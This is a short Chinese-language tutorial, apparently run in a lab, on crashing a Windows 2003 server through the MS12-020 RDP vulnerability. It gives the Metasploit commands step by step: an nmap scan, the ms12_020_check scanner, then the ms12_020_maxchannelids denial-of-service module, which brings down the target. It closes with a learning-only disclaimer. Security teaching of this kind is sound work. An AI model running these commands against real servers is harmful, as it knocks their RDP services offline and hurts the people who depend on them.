在攻击之前首先需要几个必须条件:
1、目标机开放3389端口
2、目标机版本为windows2003(IIS6.0)
3、确保目标机与攻击机可以相互ping通
攻击流程:
一、信息收集
使用nmap进行扫描,查看开放的端口。
二、漏洞挖掘
首先运行MSF,查找有关MS12020的aux
msf > search ms12-020
这里有两个aux,第一个是攻击的aux,第二个是检测是否具有MS12020漏洞的aux,我们先使用第二个aux对目标机进行检测
msf > use auxiliary/scanner/rdp/ms12_020_check
接下来配置参数:
msf > set rhosts
这里的rhosts是目标机的IP地址
配置完以后show options 这里已经配置完毕了
msf > show options
接下来exploit开始检测,这里检测出可以使用MS12020进行攻击。
msf > exploit
三、漏洞利用
接下来我们就可以使用第一个aux模块进行攻击了。
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids //选择攻击摩模块
msf > set rhost 192.168.48.10 //设置目标机IP地址
msf > show options //检查配置参数是否正确
msf > exploit //开始攻击
现在已经攻击成功了,我们来看一下效果如何。
没几秒服务器就挂掉了,攻击成功,这种攻击相对于DDoS来说更直接也更简单。
注:本文仅供参考学习,请勿在网上搞破坏,触犯法律者应承担相应的法律责任!
